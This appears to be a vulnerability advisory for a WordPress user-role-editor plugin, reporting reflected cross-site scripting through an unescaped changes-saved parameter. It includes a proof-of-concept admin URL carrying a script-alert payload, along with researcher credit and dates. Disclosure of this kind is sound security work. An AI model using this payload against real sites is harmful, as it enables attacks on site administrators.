The plugin does not sanitise and escape the changes-saved parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=wpfront-user-role-editor-bulk-edit&screen=add-remove-cap&submit=Next+Step&changes-saved=%3Cscript%3Ealert%28/XSS/%29%3C%2Fscript%3E
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2021-11-23 (about 1 years ago)
2021-11-23 (about 1 years ago)
2022-09-26 (about 4 months ago)